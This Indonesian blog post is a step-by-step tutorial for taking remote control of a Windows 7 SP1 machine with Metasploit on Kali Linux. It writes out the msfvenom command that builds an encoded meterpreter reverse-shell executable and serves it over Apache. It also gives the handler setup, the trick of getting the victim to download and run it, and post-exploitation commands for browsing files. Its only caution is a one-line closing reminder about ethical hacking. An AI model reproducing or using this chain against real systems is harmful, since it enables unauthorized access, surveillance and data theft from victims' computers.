Welcome to My Personal Blog

Hack Windows 7 SP1 dengan Metasploit pada Kali Linux

Salah satu jenis hacking yang ada yaitu operating system  hacking, untuk melakukan hacking operating system kali ini saya akan share tentang membobol Windows 7 SP1 dengan menggunakan metasploit yang ada pada kali linux. Asumsi saya adalah windows sebagai target tidak memiliki antivirus serta kali linux dan target windows berada pada satu jaringan menggunakan IP:

  • Windows : 192.168.1.100
  • Kali Linux : 192.168.1.200

Cara kerja hacking kali ini dengan memanfaatkan msfvenom untuk membuat exploit dan payload menjadi sebuah file .exe. File ini yang nanti akan dikirim ke user untuk dieksekusi sehingga kali linux bisa mendapatkan sesi control terhadap windows menggunakan meterpreter.

Langkah langkah yang dilakukan adalah:

Buat exploit dengan msfvenom, buka terminal kali linux dan ketik perintah berikut

[email protected]# cd /var/www/
[email protected]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.200 LPORT=443 -f exe > exploit.exe
[email protected]# service apache2 start

Perintah ini akan membuat sebuah exploit dengan nama “exploit.exe”, file ini akan kita sebarkan dengan layanan web. Langkah Selanjutnya adalah menjalankan metasploit

[email protected]# msfconsole

tunggu sampai proses selesai dan menampilkan console metasploit dengan tanda msf> Selanjutnya pilih exploit yang akan digunakan, payload, settingan host dan port

msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set lhost 192.168.1.200
msf> set lport 443

Jika sudah dilakukan maka metasploit siap untuk melakukan exploit, tinggal kita trigger dengan mengetikan perintah:

msf>exploit

jika sudah jalan, kita tinggal mengirimkan exploit kita ke user windows 7 tadi. misalnya kirimkan lewat disk, share, ftp ataupun lewat link web. User windows tinggal melaukakan klik ke url http://192.168.1.200/exploit.exe dan menjalankannya. Begitu user menjalankan exploit, maka windowsnya langsung terhubung dengan metasploit di kali linux.

jika sesi sudah terbentuk antara windows dan kali linux, maka di terminal kali linux tadi akan berubah menjadi meterpreter> apabila sudah ditahap ini, exploit berhasil dilakukan dan kali linux bisa melakukan apa saja terhadap windows, copy file, hapus file, upload/download, lihat desktop, hidupkan webcam dll. Untuk memastikan exploit sudah berhasil ketik perintah:

meterpreter> sysinfo

Jika sudah menampilkan windows 7 sesuai target kita, kita bisa browse data user dll, misal:

meterpreter> cd D:
meterpreter> dir

Semoga berhasil. Ingat, sebagai ethical hacker anda tidak boleh melakukan teknik ini sembarangan. Terimakasih. 🙂

 

Tinggalkan Komentar